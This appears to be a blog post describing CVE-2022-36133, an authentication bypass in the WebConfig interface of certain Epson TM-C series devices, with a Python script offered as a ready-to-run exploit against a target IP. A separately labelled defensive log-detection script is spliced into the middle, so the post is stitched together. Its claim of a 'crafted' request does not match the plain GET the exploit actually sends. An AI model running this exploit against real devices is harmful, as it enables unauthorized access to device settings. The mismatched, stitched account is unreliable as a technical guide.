Introduction

A new vulnerability, identified as CVE-2022-36133, has been discovered in the WebConfig functionality of Epson TM-C350 and TM-C750 devices with firmware version WAM31500. This vulnerability allows attackers to bypass the authentication process and gain unauthorized access to the device's settings, putting the device's security and potentially sensitive data at risk. In this post, we will explore the details of the vulnerability, possible exploitation methods, and the relevant code snippets that demonstrate the issue. Furthermore, external resources, including links to the original references, are provided for a deeper understanding of the matter.

Exploit Details

The authentication bypass vulnerability in the WebConfig functionality of the affected Epson devices stems from a weak implementation of the login process. Specifically, the WebConfig service does not require a valid username and password when a user attempts to log in. Instead, an attacker can bypass the credential check by manipulating the session cookies or by sending a crafted HTTP request to the service.

To exploit this vulnerability, an attacker can craft a malicious HTTP request and send it to the targeted device's WebConfig service to establish an unauthorized session. Once the session is established, the attacker has full access to the device settings, potentially causing further harm by changing sensitive information or causing denial of service.
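Because the attack consists of plain HTTP requests to the device's WebConfig path, the simplest defensive control is to watch who is talking to that path. The following Python script is an added detection example, not code from the original post: it parses constructed proxy log lines in an assumed key=value format and flags any request to a printer's /webconfig/ path that does not originate from an assumed management subnet (10.0.1.0/24). The log format, the subnet and the printer inventory are all assumptions for the example.

```python
import ipaddress
import re
from typing import Dict, List, Optional

# Constructed sample log lines in an ASSUMED proxy/firewall format:
#   "<timestamp> src=<ip> dst=<ip> method=<verb> path=<path> status=<code>"
SAMPLE_LOGS = [
    "2022-11-25T06:15:01Z src=10.0.5.20 dst=192.168.1.100 method=GET path=/webconfig/ status=302",
    "2022-11-25T06:15:02Z src=10.0.5.20 dst=192.168.1.100 method=POST path=/webconfig/settings status=200",
    "2022-11-25T06:16:10Z src=10.0.1.5 dst=192.168.1.100 method=GET path=/webconfig/ status=302",
    "2022-11-25T06:17:00Z src=10.0.5.21 dst=192.168.1.100 method=GET path=/ status=200",
    "this line is not in the expected format",
]

# Assumed environment: only this subnet should ever manage printers,
# and this is the set of printer addresses from the asset inventory.
MANAGEMENT_NET = ipaddress.ip_network("10.0.1.0/24")
PRINTERS = {"192.168.1.100"}

LOG_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) "
    r"method=(?P<method>\S+) path=(?P<path>\S+) status=(?P<status>\d+)$"
)


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one log line into a dict, or return None for unparseable lines."""
    match = LOG_RE.match(line.strip())
    return match.groupdict() if match else None


def flag_webconfig_access(
    lines: List[str],
    management_net: ipaddress.IPv4Network = MANAGEMENT_NET,
    printers=PRINTERS,
) -> List[Dict[str, str]]:
    """Return one alert per request to /webconfig/ on a known printer
    whose source address lies outside the management network."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue                        # skip malformed lines
        if rec["dst"] not in printers:
            continue                        # traffic to something other than a printer
        if not rec["path"].startswith("/webconfig/"):
            continue                        # not the WebConfig interface
        try:
            src = ipaddress.ip_address(rec["src"])
        except ValueError:
            continue                        # garbage source field; ignore
        if src in management_net:
            continue                        # expected administrative access
        alerts.append({
            "time": rec["ts"],
            "src": rec["src"],
            "printer": rec["dst"],
            "request": f"{rec['method']} {rec['path']}",
            "status": rec["status"],
            "reason": "WebConfig access from outside management network",
        })
    return alerts


if __name__ == "__main__":
    for alert in flag_webconfig_access(SAMPLE_LOGS):
        print(alert)
```

Run against the constructed sample, the script reports the two requests from 10.0.5.20 and stays silent for the management host 10.0.1.5 and for the request to "/". Change `MANAGEMENT_NET` and `PRINTERS` to match the real environment, and feed it the actual proxy or firewall log once the regular expression is adapted to that log's format.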

Code Snippet

Below is a sample Python script that can be used to exploit this vulnerability on a target Epson TM-C350 or TM-C750 device, running firmware version WAM31500.

import requests

target_ip = '192.168.1.100'   # Replace with target device's IP address
exploit_url = f'http://{target_ip}/webconfig/'

# Browser-like headers sent with the request to the WebConfig service
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36',
    'Accept': '*/*',
    'Referer': exploit_url,
    'Accept-Encoding': 'gzip, deflate',
}

# Request the WebConfig page without any credentials; redirects are not
# followed so the device's own response can be inspected directly.
response = requests.get(exploit_url, headers=headers, allow_redirects=False, timeout=10)

# A 302 redirect straight to index.html (rather than to a login page) is
# treated as an unauthenticated session being granted.
if response.status_code == 302 and response.headers.get('Location') == f'{exploit_url}index.html':
    print('[+] Exploit successful! You are now logged in.')
    print(f'Visit {exploit_url} to access the device settings.')
else:
    print('[-] Exploit failed. Target device might not be vulnerable or has already been patched.')

Original References

For more information regarding this vulnerability and its implications, please refer to the following resources:

1. MITRE's CVE Listing for CVE-2022-36133
2. National Vulnerability Database (NVD) - CVE-2022-36133

Conclusion

The CVE-2022-36133 vulnerability, as explained above, allows unauthorized access to Epson TM-C350 and TM-C750 devices running firmware version WAM31500. Attackers can exploit it to bypass the authentication process using a crafted HTTP request. It is therefore crucial for owners of affected devices to apply any security patches made available by the manufacturer, in order to mitigate the risk of unauthorized access to and manipulation of device settings.

Timeline

Published on: 11/25/2022 06:15:00 UTC
Last modified on: 11/30/2022 20:49:00 UTC